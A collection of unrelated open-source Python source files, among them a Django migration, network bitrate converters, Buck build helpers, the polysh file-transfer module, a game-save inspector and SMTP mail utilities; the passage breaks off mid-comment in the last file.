def _episode_strings(self, ep_obj, **kwargs):
return \
super(TVChaosUKProvider, self)._episode_strings(
ep_obj, scene=False, date_detail=(
lambda date: ['%s %s %s'.lstrip('0') % x for x in
[((d[-1], '%s' % m, y), (d, m, y)) + (((d, mf, y),), ())[m == mf]
for (d, m, mf, y) in [(date.strftime(x) for x in ('%d', '%b', '%B', '%Y'))]][0]]),
ep_detail=(lambda e: [naming_ep_type[2] % e] + (
[], ['%(episodenumber)d of' % e])[1 == try_int(e.get('seasonnumber'))]), **kwargs)
@staticmethod
def ui_string(key):
return ('tvchaosuk_tip' == key
and 'releases are often "Air by date release names" - edit search settings of show if required'
or 'tvchaosuk_use_after_get_data' == key and 'Send "Say thanks!"'
or 'tvchaosuk_use_after_get_data_tip' == key and 'to each release that is snatched'
or '')
provider = TVChaosUKProvider()
| SickGear/SickGear | sickbeard/providers/tvchaosuk.py | Python | gpl-3.0 | 15,109 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-21 13:19
from __future__ import unicode_literals
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
replaces = [
("wladmin", "0001_initial"),
("wladmin", "0002_auto_20180118_1020"),
("wladmin", "0003_auto_20180215_1127"),
]
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="ConfigurationError",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=150, unique=True)),
("message", models.TextField()),
("timestamp", models.DateTimeField(default=django.utils.timezone.now)),
("ignored", models.BooleanField(default=False)),
],
options={"ordering": ["-timestamp"]},
),
migrations.AlterIndexTogether(
name="configurationerror", index_together=set([("ignored", "timestamp")])
),
]
| dontnod/weblate | weblate/wladmin/migrations/0001_squashed_0003_auto_20180215_1127.py | Python | gpl-3.0 | 1,324 |
from data import Source
class OctetsToBitrate(Source):
def __init__(self, name, sources, intervals_average=1):
self.name = name
self.dependencies = sources
self.intervals_average = intervals_average
def set_interval(self, interval):
self.interval = interval
def run(self):
total = 0
for name in self.dependencies:
dataset = self.data.get_dataset(name)
try:
a = dataset.nth_latest_value(self.intervals_average + 1)
b = dataset.latest_value()
except IndexError:
a = 0
b = 0
# make sure the octets are already integers
a = int(a)
b = int(b)
# this happens on the first run
if a == 0 or b == 0:
pass
elif b < a: # difference between oldest two entries, modulo 16/32/64 (overflows)
# overflow happened
# guess the size of the counter
size = len(bin(a)) - 2
# round to the next multiple of 8
size = (size + 7) / 8 * 8
# rest to maxint(size)
rest = 2**size - a
a = 0
                # accumulate like the non-overflow branch; several source
                # counters may contribute to this total
                total += rest + b
else:
total += (b - a)
bitrate = (total * 8) / (self.interval * self.intervals_average)
self.data.add(self.name, bitrate)
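# Illustrative helper (usage sketch, not used by the classes in this module):
# the counter wrap-around arithmetic from OctetsToBitrate.run() above, pulled
# out as a standalone function so it can be exercised on its own. The counter
# width is guessed from the previous reading and rounded up to a multiple of
# 8 bits, mirroring the logic above.
def _counter_delta_sketch(previous, current):
    """Return the octet delta between two readings, allowing one wrap."""
    previous = int(previous)
    current = int(current)
    if current >= previous:
        return current - previous
    size = len(bin(previous)) - 2        # bits needed for the old value
    size = (size + 7) // 8 * 8           # round up to 8/16/32/64 bit counters
    return (2 ** size - previous) + current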
class SimpleConversion(Source):
def __init__(self, name, source, func):
self.name = name
self.source = source
self.dependencies = [source]
self.func = func
def run(self):
dataset = self.data.get_dataset(self.source)
try:
value = dataset.latest_value()
except IndexError:
return
new = self.func(value)
self.data.add(self.name, new)
class Percentage(Source):
def __init__(self, name, value, maximum):
self.name = name
self.value = value
self.maximum = maximum
self.dependencies = [value]
def run(self):
val_dataset = self.data.get_dataset(self.value)
max_dataset = self.data.get_dataset(self.maximum)
try:
new = round(100.0 / max_dataset.latest_value() * val_dataset.latest_value(), 2)
except IndexError:
return
except ZeroDivisionError:
return
self.data.add(self.name, new)
class PerSecond(Source):
def __init__(self, name, sources):
self.name = name
self.dependencies = sources
def set_interval(self, interval):
self.interval = interval
def run(self):
total = 0
for name in self.dependencies:
dataset = self.data.get_dataset(name)
try:
                a, b = dataset.two_latest_values()
except IndexError:
a = 0
b = 0
# make sure the octets are already integers
a = int(a)
b = int(b)
# this happens on the first run
if a == 0 or b == 0:
return
# difference between oldest two entries, modulo 16/32/64 (overflows)
if b < a:
# overflow happened
# FIXME
b = a # no, really. FIXME.
total += (b - a)
rate = total / self.interval
self.data.add(self.name, rate)
class Sum(Source):
def __init__(self, name, sources):
self.name = name
self.dependencies = sources
def run(self):
total = 0
for name in self.dependencies:
dataset = self.data.get_dataset(name)
l = int(dataset.latest_value())
total += l
self.data.add(self.name, total)
| Selfnet/dashboard | backend/dash/conversions.py | Python | bsd-2-clause | 3,791 |
from __future__ import print_function
import json
import os
import subprocess
import tempfile
import textwrap
import shutil
import sys
from buck_repo import check_output, which
from tracing import Tracing
def get_file_contents_if_exists(path, default=None):
with Tracing('BuckProject.get_file_contents_if_it_exists', args={'path': path}):
if not os.path.exists(path):
return default
with open(path) as f:
contents = f.read().strip()
return default if not contents else contents
def write_contents_to_file(path, contents):
with Tracing('BuckProject.write_contents_to_file', args={'path': path}):
with open(path, 'w') as output_file:
output_file.write(str(contents))
class BuckProject:
def __init__(self, root):
self.root = root
self._buck_out = os.path.join(root, "buck-out")
buck_out_tmp = os.path.join(self._buck_out, "tmp")
if not os.path.exists(buck_out_tmp):
os.makedirs(buck_out_tmp)
self._buck_out_log = os.path.join(self._buck_out, "log")
if not os.path.exists(self._buck_out_log):
os.makedirs(self._buck_out_log)
self.tmp_dir = tempfile.mkdtemp(prefix="buck_run.", dir=buck_out_tmp)
# Only created if buckd is used.
self.buckd_tmp_dir = None
self.buckd_dir = os.path.join(root, ".buckd")
self.autobuild_pid_file = os.path.join(self.buckd_dir, "autobuild.pid")
self.buckd_port_file = os.path.join(self.buckd_dir, "buckd.port")
self.buckd_run_count_file = (os.path.join(
self.buckd_dir, "buckd.runcount"))
self.buckd_version_file = os.path.join(self.buckd_dir, "buckd.version")
self.has_no_buck_check = (os.path.exists(os.path.join(
self.root, ".nobuckcheck")))
if self.has_no_buck_check:
print(textwrap.dedent("""\
:::
::: '.nobuckcheck' file is present. Not updating buck.
:::"""), file=sys.stderr)
buck_version_path = os.path.join(self.root, ".buckversion")
buck_version = get_file_contents_if_exists(buck_version_path)
self.buck_version = buck_version.split(':') if buck_version else None
buck_javaargs_path = os.path.join(self.root, ".buckjavaargs")
self.buck_javaargs = get_file_contents_if_exists(buck_javaargs_path)
def get_buckd_run_count(self):
return int(get_file_contents_if_exists(self.buckd_run_count_file, -1))
def get_running_buckd_version(self):
return get_file_contents_if_exists(self.buckd_version_file)
def get_autobuild_pid(self):
return get_file_contents_if_exists(self.autobuild_pid_file)
def get_buckd_port(self):
return get_file_contents_if_exists(self.buckd_port_file)
def get_buck_out_log_dir(self):
return self._buck_out_log
def update_buckd_run_count(self, new_run_count):
write_contents_to_file(self.buckd_run_count_file, new_run_count)
def clean_up_buckd(self):
with Tracing('BuckProject.clean_up_buckd'):
if os.path.exists(self.buckd_dir):
shutil.rmtree(self.buckd_dir)
if which('watchman'):
trigger_list_output = check_output(
['watchman', 'trigger-list', self.root])
trigger_list = json.loads(trigger_list_output)
if not trigger_list.get('triggers'):
subprocess.call(
['watchman', 'watch-del', self.root],
stdout=open(os.devnull, 'w'))
def create_buckd_tmp_dir(self):
tmp_dir_parent = os.path.join(self.buckd_dir, "tmp")
if not os.path.exists(tmp_dir_parent):
os.makedirs(tmp_dir_parent)
self.buckd_tmp_dir = tempfile.mkdtemp(prefix="buck_run.",
dir=tmp_dir_parent)
def save_buckd_port(self, port):
write_contents_to_file(self.buckd_port_file, port)
def save_buckd_version(self, version):
write_contents_to_file(self.buckd_version_file, version)
@staticmethod
def from_current_dir():
with Tracing('BuckProject.from_current_dir'):
current_dir = os.getcwd()
if '--version' in sys.argv or '-V' in sys.argv:
return BuckProject(current_dir)
while current_dir != os.sep:
if os.path.exists(os.path.join(current_dir, ".buckconfig")):
return BuckProject(current_dir)
current_dir = os.path.dirname(current_dir)
raise NoBuckConfigFoundException()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with Tracing('BuckProject.__exit__'):
if os.path.exists(self.tmp_dir):
shutil.rmtree(self.tmp_dir)
class NoBuckConfigFoundException(Exception):
def __init__(self):
message = textwrap.dedent("""\
This does not appear to be the root of a Buck project. Please 'cd'
to the root of your project before running buck. If this really is
the root of your project, run
'touch .buckconfig'
and then re-run your buck command.""")
Exception.__init__(self, message)
| mread/buck | bin/buck_project.py | Python | apache-2.0 | 5,320 |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin
# Feel free to extend this class instead of Contact.
from cmsplugin_contact import settings
class BaseContact(CMSPlugin):
SPAM_PROTECTION_CHOICES = (
(0, 'Honeypot'),
(1, 'Akismet'),
(2, 'ReCAPTCHA'),
)
THEME_CHOICES = (
('light', _('Light')),
('dark', _('Dark')),
)
SIZE_CHOICES = (
('normal', _('Normal')),
('compact', _('Compact')),
)
form_name = models.CharField(_('Form name'),
blank=True,
max_length=60,
help_text=_('Used to distinguish multiple contact forms on the same site.'))
form_layout = models.CharField(_('Form Layout'),
max_length=255,
help_text=_('Choose the layout of contact form'),
choices=settings.CMSPLUGIN_CONTACT_FORMS
)
site_email = models.EmailField(_('Email recipient'))
thanks = models.TextField(
verbose_name=_("Thanks message"),
help_text=_('Message displayed on successful submit'),
default=_('Thank you for your message.'), max_length=200)
submit_text = models.CharField(_('Submit button value'),
default=_('Submit'), max_length=30)
spam_protection_method = models.SmallIntegerField(
verbose_name=_('Spam protection method'),
choices=SPAM_PROTECTION_CHOICES, default=0)
akismet_api_key = models.CharField(max_length=255, blank=True)
recaptcha_public_key = models.CharField(max_length=255, blank=True)
recaptcha_private_key = models.CharField(max_length=255, blank=True)
recaptcha_theme = models.CharField(max_length=20,
choices=THEME_CHOICES,
default='light',
verbose_name=_('ReCAPTCHA theme'))
recaptcha_size = models.CharField(max_length=20,
choices=SIZE_CHOICES,
default='normal',
verbose_name=_('ReCAPTCHA size'))
redirect_url = models.URLField(_('URL Redirection'),
help_text=_('If it is set, the form redirect to url '
'when the form is valid'), blank=True)
class Meta:
abstract = True
def __unicode__(self):
return self.site_email
class Contact(BaseContact):
pass
| maccesch/cmsplugin-contact | cmsplugin_contact/models.py | Python | bsd-2-clause | 2,737 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# See the COPYING file for license information.
#
# Copyright (c) 2007 Guillaume Chazarain <guichaz@gmail.com>
import base64
import math
import os
import pipes
import random
import subprocess
import sys
import zipimport
from polysh import callbacks
from polysh import pity
from polysh.console import console_output
from polysh import remote_dispatcher
from polysh import dispatchers
def pity_dot_py_source():
path = pity.__file__
if not os.path.exists(path):
try:
zip_importer = zipimport.zipimporter(os.path.dirname(path))
except Exception:
return
return zip_importer.get_source('pity')
if not path.endswith('.py'):
# Read from the .py source file
dot_py_start = path.find('.py')
if dot_py_start >= 0:
path = path[:dot_py_start+3]
return file(path).read()
def base64version():
python_lines = []
for line in pity_dot_py_source().splitlines():
hash_pos = line.find('#')
if hash_pos >= 0:
line = line[:hash_pos]
line = line.rstrip()
if line:
python_lines.append(line)
python_source = '\n'.join(python_lines)
encoded = base64.encodestring(python_source).rstrip('\n').replace('\n', ',')
return encoded
def tarCreate(path):
if path:
path = path.rstrip('/') or '/'
else:
path = '.'
dirname = pipes.quote(os.path.dirname(path) or '.')
basename = pipes.quote(os.path.basename(path) or '/')
return 'tar c -C %s %s' % (dirname, basename)
BASE64_PITY_PY = base64version()
CMD_PREFIX = 'python -c "`echo "%s"|tr , \\\\\\n|openssl base64 -d`" ' % \
BASE64_PITY_PY
CMD_UPLOAD_EMIT = ('STTY_MODE="$(stty --save)";' +
'stty raw &> /dev/null;' +
'echo %s""%s;' +
CMD_PREFIX + ' %s upload %s;' +
'stty "$STTY_MODE"\n')
CMD_REPLICATE_EMIT = '%s | ' + CMD_PREFIX + ' %s replicate %s\n'
CMD_FORWARD = CMD_PREFIX + ' %s forward %s %s %s\n'
def tree_max_children(depth):
return 2 + depth/2
class file_transfer_tree_node(object):
def __init__(self,
parent,
dispatcher,
children_dispatchers,
depth,
should_print_bw,
path=None,
is_upload=False):
self.parent = parent
self.host_port = None
self.remote_dispatcher = dispatcher
self.children = []
if path:
self.path = path
self.is_upload = is_upload
num_children = min(len(children_dispatchers), tree_max_children(depth))
if num_children:
child_length = int(math.ceil(float(len(children_dispatchers)) /
num_children))
depth += 1
for i in xrange(num_children):
begin = i * child_length
if begin >= len(children_dispatchers):
break
child_dispatcher = children_dispatchers[begin]
end = begin + child_length
begin += 1
child = file_transfer_tree_node(self,
child_dispatcher,
children_dispatchers[begin:end],
depth,
should_print_bw)
self.children.append(child)
self.should_print_bw = should_print_bw(self)
self.try_start_pity()
def host_port_cb(self, host_port):
self.host_port = host_port
self.parent.try_start_pity()
def try_start_pity(self):
host_ports = [child.host_port for child in self.children]
if len(filter(bool, host_ports)) != len(host_ports):
return
host_ports = ' '.join(map(pipes.quote, host_ports))
if self.should_print_bw:
opt = '--print-bw'
else:
opt = ''
if self.parent:
cb = lambda host_port: self.host_port_cb(host_port)
t1, t2 = callbacks.add('file_transfer', cb, False)
cmd = CMD_FORWARD % (opt, t1, t2, host_ports)
elif self.is_upload:
def start_upload(unused):
local_uploader(self.path, self.remote_dispatcher)
t1, t2 = callbacks.add('upload_start', start_upload, False)
cmd = CMD_UPLOAD_EMIT % (t1, t2, opt, host_ports)
else:
cmd = CMD_REPLICATE_EMIT % (tarCreate(self.path), opt, host_ports)
self.remote_dispatcher.dispatch_command(cmd)
def __str__(self):
children_str = ''
for child in self.children:
child_str = str(child)
for line in child_str.splitlines():
children_str += '+--%s\n' % line
return '%s\n%s' % (self.remote_dispatcher.display_name, children_str)
def replicate(shell, path):
peers = [i for i in dispatchers.all_instances() if i.enabled]
if len(peers) <= 1:
console_output('No other remote shell to replicate files to\n')
return
def should_print_bw(node, already_chosen=[False]):
if not node.children and not already_chosen[0] and not node.is_upload:
already_chosen[0] = True
return True
return False
sender_index = peers.index(shell)
destinations = peers[:sender_index] + peers[sender_index+1:]
tree = file_transfer_tree_node(None,
shell,
destinations,
0,
should_print_bw,
path=path)
class local_uploader(remote_dispatcher.remote_dispatcher):
def __init__(self, path_to_upload, first_destination):
self.path_to_upload = path_to_upload
self.trigger1, self.trigger2 = callbacks.add('upload_done',
self.upload_done,
False)
self.first_destination = first_destination
self.first_destination.drain_and_block_writing()
remote_dispatcher.remote_dispatcher.__init__(self, '.')
self.temporary = True
def launch_ssh(self, name):
cmd = '%s | (openssl base64; echo %s) >&%d' % (
tarCreate(self.path_to_upload),
pity.BASE64_TERMINATOR,
self.first_destination.fd)
subprocess.call(cmd, shell=True)
os.write(1, self.trigger1 + self.trigger2 + '\n')
os._exit(0) # The atexit handler would kill all remote shells
def upload_done(self, unused):
self.first_destination.allow_writing()
def upload(local_path):
peers = [i for i in dispatchers.all_instances() if i.enabled]
if not peers:
console_output('No other remote shell to replicate files to\n')
return
if len(peers) == 1:
# We wouldn't be able to show the progress indicator with only one
# destination. We need one remote connection in blocking mode to send
# the base64 data to. We also need one remote connection in non blocking
# mode for polysh to display the progress indicator via the main select
# loop.
console_output('Uploading to only one remote shell is not supported, '
'use scp instead\n')
return
def should_print_bw(node, already_chosen=[False]):
if not node.children and not already_chosen[0]:
already_chosen[0] = True
return True
return False
tree = file_transfer_tree_node(None,
peers[0],
peers[1:],
0,
should_print_bw,
path=local_path,
is_upload=True)
| daniyalzade/polysh | polysh/file_transfer.py | Python | gpl-2.0 | 8,669 |
#!/usr/bin/env python3
from collections import defaultdict
from os.path import basename, join
import pprint
import extract
def readable_bytes(data: bytes) -> str:
return ' '.join(str(b).zfill(3) for b in data)
falloutformat = """{fname}
flags: {flags}
Flag 1
flag1data: {flag1data}
Flag 6
factionsize: {factionsize}
factions: {factions}
Flag 5
name: {name}
Flag 24
gender: {gender}
Flag 11
flag11unknown1: {flag11unknown1}
headpart1: {headpart1}
unknowncolor: {unknowncolor}
headpart2: {headpart2}
headpartcount: {headpartcount}
headparts: {headparts}
tetitendpresent: {tetitendpresent}
tetitendsize: {tetitendsize}
tetitend: {tetitend}
facesliderssize: {facesliderssize}
facesliders: {facesliders}
faceextrassize: {faceextrassize}
faceextras: {faceextras}
Flag 14
bodyunknowncount: {bodyunknowncount}
bodyunknown: {bodyunknown}
bodysliderthin: {bodysliderthin}
bodyslidermuscular: {bodyslidermuscular}
bodysliderlarge: {bodysliderlarge}
"""
def dump_file(fname, rawplayer, npc, achr):
with open(fname, 'rb') as f:
rawdata = f.read()
game, data = extract.parse_savedata(rawdata)
cfdata = extract.parse_changeforms(data['changeforms'])
if rawplayer:
with open(join('savedumps', basename(fname) + '.rawsavedump'), 'w') as f:
f.write('{}\n\n{}'.format(cfdata['playerchangeflags'],
readable_bytes(cfdata['playerdata'])))
return
player = extract.parse_player(cfdata['playerdata'],
cfdata['playerchangeflags'],
game)
if npc:
out = ''
if game == 'fallout4':
keys = defaultdict(str)
keys['fname'] = fname
keys['flags'] = cfdata['playerchangeflags']
keys.update({k:(readable_bytes(v) if isinstance(v, bytes) else v)
for k,v in player.items()})
out = falloutformat.format_map(keys)
with open(join('savedumps', basename(fname) + '.savedump'), 'w') as f:
f.write(out)
if achr:
cfdata2 = extract.parse_changeforms(data['changeforms'], refidnr=0x14)
with open(join('savedumps', basename(fname) + '.ACHRsavedump'), 'w') as f:
flags = cfdata2['playerchangeflags']
f.write('{}\n\n{}'.format(flags, readable_bytes(cfdata2['playerdata'])))
def dry_transfer(sourcefname, targetfname):
with open(sourcefname, 'rb') as f:
sourcerawdata = f.read()
with open(targetfname, 'rb') as f:
targetrawdata = f.read()
sourcegame, sourcedata = extract.parse_savedata(sourcerawdata)
targetgame, targetdata = extract.parse_savedata(targetrawdata)
# Get the player data from the source save
sourcecfdata = extract.parse_changeforms(sourcedata['changeforms'])
sourceplayer = extract.parse_player(sourcecfdata['playerdata'],
sourcecfdata['playerchangeflags'],
sourcegame)
# Get the data from target save
targetcfdata = extract.parse_changeforms(targetdata['changeforms'])
targetplayer = extract.parse_player(targetcfdata['playerdata'],
targetcfdata['playerchangeflags'],
targetgame)
# Merge players, return target player with source's face
newplayer, newflags = extract.merge_player(
sourceplayer, sourcecfdata['playerchangeflags'],
targetplayer, targetcfdata['playerchangeflags'],
sourcegame
)
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(newplayer)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('files', nargs='+')
parser.add_argument('-n', '--npc', action='store_true')
parser.add_argument('-a', '--achr', action='store_true')
parser.add_argument('-p', '--raw-player', action='store_true')
parser.add_argument('-d', '--dry-transfer', action='store_true')
args = parser.parse_args()
if args.dry_transfer:
dry_transfer(args.files[0], args.files[1])
else:
for f in args.files:
dump_file(f, args.raw_player, args.npc, args.achr)
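# Hedged command-line sketch of the modes wired up above; the save-file names
# are placeholders, and a 'savedumps' directory is assumed to exist for the
# dump modes:
#
#     python3 inspectsave.py -n quicksave.fos              # NPC/player dump
#     python3 inspectsave.py -p quicksave.fos              # raw player data dump
#     python3 inspectsave.py -d source.fos target.fos      # dry-run face transfer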
| nycz/SkyrimFaceTransfer | inspectsave.py | Python | gpl-3.0 | 4,220 |
from __future__ import absolute_import, unicode_literals
import re
from django.forms import RegexField
from .widgets import ColorFieldWidget
RGB_REGEX = re.compile('^#?((?:[0-9a-fA-F]{3}){1,2})$', re.IGNORECASE)
class RGBColorField(RegexField):
"""Form field for regular forms"""
widget = ColorFieldWidget
def __init__(self, **kwargs):
kwargs['regex'] = RGB_REGEX
super(RGBColorField, self).__init__(**kwargs)
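# Hedged usage sketch: the form and field names below are illustrative only and
# are not part of this module.
#
#     class PaletteForm(forms.Form):
#         background = RGBColorField()
#
# A submitted value such as '#1A2B3C' (or '1A2B3C') validates against
# RGB_REGEX; anything else raises a ValidationError.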
| charettes/django-colorful | colorful/forms.py | Python | mit | 439 |
"""
Copyright 2015 Stefano Terna
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .settings import Settings | iottly/prettysettings | prettysettings/__init__.py | Python | apache-2.0 | 594 |
from .dialog import AddOnsDialog
| umlfri/umlfri2 | umlfri2/qtgui/appdialogs/addons/__init__.py | Python | gpl-3.0 | 33 |
#
# This file is part of the CCP1 Graphical User Interface (ccp1gui)
#
# (C) 2002-2005 CCLRC Daresbury Laboratory
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# manage selections
#
# Rather inefficient, as it will probably
# re-image for each atom added/deleted
#
debug=0
class SelectionManager:
def __init__(self):
self.selected = []
self.add_funcs = []
self.rem_funcs = []
def add(self,mol,atoms):
for atom in atoms:
x = (mol,atom)
try:
t = self.selected.index(x)
except ValueError:
self.selected.append((mol,atom))
# perform all tasks dependent on the selection
for f in self.add_funcs:
f(mol,atoms)
def append(self,mol,atoms):
        ''' Add atoms without checking whether they are already selected '''
for atom in atoms:
self.selected.append((mol,atom))
# perform all tasks dependent on the selection
for f in self.add_funcs:
f(mol,atoms)
def rem(self,mol,atoms):
ra = []
for atom in atoms:
x = (mol,atom)
try:
self.selected.remove(x)
ra.append(atom)
except ValueError:
pass
for f in self.rem_funcs:
f(mol,ra)
def clear(self):
if debug: print 'clear selection'
for s in self.selected:
mol,atom = s
for f in self.rem_funcs:
f(mol,[atom])
self.selected = []
def toggle(self,mol,atoms):
if debug: print 'toggle'
aa = []
ra = []
for atom in atoms:
if debug: print 'tog',atom.get_index()
x = (mol,atom)
try:
self.selected.remove(x)
if debug: print 'rem'
ra.append(atom)
except ValueError:
self.selected.append(x)
if debug: print 'add'
aa.append(atom)
for f in self.rem_funcs:
f(mol,ra)
for f in self.add_funcs:
f(mol,aa)
def call_on_add(self,f):
self.add_funcs.append(f)
def call_on_rem(self,f):
self.rem_funcs.append(f)
def clean_deleted(self,mol):
''' Remove atoms from the selection if the atoms
are no longer part of the molecule'''
dead = []
for s in self.selected:
mol1,atom = s
if mol == mol1:
try:
test = mol.atom.index(atom)
except ValueError:
dead.append(s)
for d in dead:
self.selected.remove(d)
def get(self):
return self.selected
def get_centroid(self):
sel = self.selected
if not len(sel):
return
x=0.0;y=0.0;z=0.0;n=0
for mol,atom in sel:
x = x + atom.coord[0]
y = y + atom.coord[1]
z = z + atom.coord[2]
n=n+1
x = x / float(n)
y = y / float(n)
z = z / float(n)
return [x,y,z]
def printsel(self):
mols = []
for s in self.selected:
mol,atom = s
try:
test = mols.index(mol)
except ValueError:
mols.append(mol)
for mol in mols:
print mol.title
for a in self.get_by_mol(mol):
print a.get_index(),
print ""
def get_by_mol(self,mol):
result = []
for s in self.selected:
tmol,atom = s
if debug: print 'check',tmol.title, atom
if tmol == mol:
result.append(atom)
if debug:
print 'get_by_mol returned',len(result),'atoms'
return result
def get_mols(self):
mols = []
for s in self.selected:
tmol,atom = s
try:
t = mols.index(tmol)
except ValueError:
mols.append(tmol)
if debug:
            print 'get_mols returned',len(mols),mols
return mols
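# Hedged usage sketch (the mol/atom objects and the highlight callbacks come
# from the surrounding GUI code and are only assumed here):
#
#     sel = SelectionManager()
#     sel.call_on_add(lambda mol, atoms: highlight(mol, atoms))
#     sel.call_on_rem(lambda mol, atoms: unhighlight(mol, atoms))
#     sel.add(mol, [atom1, atom2])     # triggers the add callbacks
#     centre = sel.get_centroid()      # [x, y, z] of the current selection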
| alexei-matveev/ccp1gui | viewer/selections.py | Python | gpl-2.0 | 4,789 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
#
# Copyright (c) 2016 Cédric Clerget - HPC Center of Franche-Comté University
#
# This file is part of Janua-SMS
#
# http://github.com/mesocentrefc/Janua-SMS
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import re
from socket import getdefaulttimeout
import smtplib
from string import Template as STemplate
from mailem.connection import SMTPConnection
from mailem import Message, Postman
from mailem.template import Template
from mailem.template.renderer import IRenderer
class UnicodePythonTemplateRenderer(IRenderer):
""" Simple Python Template renderer.
Supported substitutions:
* PythonTemplateRenderer('$what')(what=1) #-> '1'
* PythonTemplateRenderer('${what}')(what=1) #-> '1'
* PythonTemplateRenderer('$$what')(what=1) #-> '$what'
"""
def __init__(self, template):
self.template = STemplate(unicode(template, 'utf-8'))
def __call__(self, values):
return self.template.substitute(values)
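# Hedged rendering sketch (the template text and values are illustrative only):
#
#     render = UnicodePythonTemplateRenderer('Dear $name, your code is ${code}')
#     render({'name': u'Ada', 'code': 42})  # -> u'Dear Ada, your code is 42'
#
# Note that the template argument is expected to be a UTF-8 encoded byte
# string, since it is decoded with unicode(template, 'utf-8') above.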
class MailError(Exception):
"""Mail error exception"""
pass
class ESMTPConnection(SMTPConnection):
def __init__(self, host, port, username, password, local_hostname=None, ssl=False, tls=False, timeout=getdefaulttimeout()):
self.host = host
self.port = port
self.username = username
self.password = password
self.local_hostname = local_hostname
self.ssl = ssl
self.tls = tls
self.timeout = timeout
self.client = None
def connect(self):
# Init
s = (smtplib.SMTP_SSL
if self.ssl else
smtplib.SMTP)(self.host, self.port, self.local_hostname, timeout=self.timeout)
# Handshake
if self.tls:
s.starttls()
if self.username and self.password:
s.login(self.username, self.password)
# Finish
self.client = s
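# Hedged connection sketch; the host name and credentials are placeholders, not
# values used by Janua-SMS itself:
#
#     conn = ESMTPConnection('smtp.example.org', 587, 'user', 'secret', tls=True)
#     conn.connect()  # performs the optional STARTTLS handshake and login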
class MailObj(object):
"""
    Mail object which is passed to the mail queue (see :class:`janua.utils.sqlite_queue.PersistentSqliteQueue`).
.. note::
If template attribute is defined, message and subject will be ignored
**Example to send an email:**
.. code-block:: python
from janua import mail_queue
from janua.utils.mail import MailObj, MailError
from janua.utils.logger import getLogger
log = getLogger(__name__)
try:
mailobj = MailObj()
mailobj.message = "Where are you ?"
mailobj.subject = "John"
mailobj.to = "john.doe@nothing.here"
mailobj.reply_to = "admin@nothing.here"
mailobj.bcc = ["admin@nothing.here"]
except MailError, err:
log.error('Cannot instanciate mail object')
mail_queue.put(mailobj)
"""
def __init__(self):
self._message = None
self._subject = None
self._to = []
self._template = None
self._template_args = {}
self._reply_to = None
self._bcc = None
@property
def message(self):
"""Mail body"""
return self._message
@message.setter
def message(self, value):
if not isinstance(value, basestring):
raise MailError('Message argument must be a string')
self._message = value
@property
def subject(self):
"""Mail subject"""
return self._subject
@subject.setter
def subject(self, value):
if not isinstance(value, basestring):
raise MailError('Subject argument must be a string')
self._subject = value
@property
def to(self):
"""Mail recipients"""
return self._to
@to.setter
def to(self, value):
if not isinstance(value, (basestring, list)):
raise MailError('To argument must be a string or a list')
self._to = value
@property
def template(self):
"""Mail template"""
return self._template
@template.setter
def template(self, value):
if not isinstance(value, basestring):
raise MailError('Template argument must be a string')
self._template = value
@property
    def template_args(self):
        """Mail template arguments"""
return self._template_args
@template_args.setter
def template_args(self, value):
if not isinstance(value, dict):
raise MailError('Template_args argument must be a dictionary')
self._template_args = value
@property
def reply_to(self):
"""Mail reply to recipient"""
return self._reply_to
@reply_to.setter
def reply_to(self, value):
if not isinstance(value, basestring):
raise MailError('Reply_to argument must be a string')
self._reply_to = value
@property
def bcc(self):
"""Mail blind carbon copy"""
return self._bcc
@bcc.setter
def bcc(self, value):
if not isinstance(value, list):
raise MailError('Bcc argument must be a list')
self._bcc = value
class JanuaMailer():
def __init__(self, config, januapath):
self.config = config
self.postman = None
self.januapath = januapath
if self.config.enable:
connection = ESMTPConnection(
config.smtp_host,
config.smtp_port,
config.smtp_username,
config.smtp_password,
local_hostname=None,
ssl=config.smtp_ssl,
tls=config.smtp_tls,
timeout=config.smtp_timeout
)
self.postman = Postman(config.mail_from, connection)
def get_template(self, name):
path = os.path.join(
self.januapath,
'mail_template',
self.config.mail_language.upper(),
name
)
if not os.path.exists(path):
raise MailError('Template %s not found' % name)
template = Template.from_directory(
path,
subject_name='subject.txt',
text_name='body.txt',
html_name='body.html'
)
template.set_renderer(UnicodePythonTemplateRenderer)
return template
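    # Hedged sketch of the directory layout get_template() expects; the template
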